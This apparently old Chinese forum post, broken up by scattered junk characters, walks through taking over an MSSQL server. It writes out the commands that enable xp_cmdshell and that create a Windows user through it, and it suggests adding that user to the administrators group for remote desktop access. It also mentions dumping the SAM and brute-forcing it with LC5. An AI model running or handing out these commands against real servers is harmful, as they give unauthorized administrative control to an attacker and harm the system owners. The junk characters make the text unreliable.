返回列表 发帖
本帖最后由 saitojie 于 2009-6-10 17:12 编辑 # p9 ]8 E; `- u0 |  L' }
, c9 @% C% f* _/ h* a3 J
7 L: x9 h! o  P& V1 `' m5 K' _于是开始找开启语句,对mssql的玩的少,不是太熟悉!
4 m4 b: _7 q$ [6 y1 F后来二少给我了语句,便去继续日之) Y( R+ {9 l1 H: C* e1 w3 \) c
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
9 p& `" s- z8 S3 t1为开启,0则为关闭!# {2 u& B$ f# ?% n* @$ o/ O
然后执行
' B# Z8 s: `, o5 r; C0 Y/ R2 ^1 YEXEC [master].[dbo].[xp_cmdshell] 'cmd /c net user xx xx /add'6 R, a+ e! O6 i- U9 A
即可/ ~) E) W- P0 S9 ]
回过头去看看,发现用户已经成功添加上了!
5 v. g9 k/ T0 w4 g- d) x% h4 o
; f, |! w  W: e( {# j. N
我就不明白BKK了,这个地方,你都已经加上用户了,为什么不直接加入到管理组里面,连接服务器的3389呢,为什么还要去下他的SAM,还用LC5去爆力破解呢!~~~~不明白!~~~( Y: d8 b" {  p2 i: y& g  ^
EXEC [master].[dbo].[xp_cmdshell] 'net localgroup administrators username /add',难道是因为他的3389做了登陆用户的限制?
阿呆主站:CISP中国网
注册信息安全专业人员资质认证(CISP)资料,心得以及备考指南。
阿呆的BLOG:北京SEO
这里时刻记录着阿呆在学习SEO及网络安全过程中的点点滴滴!

TOP

返回列表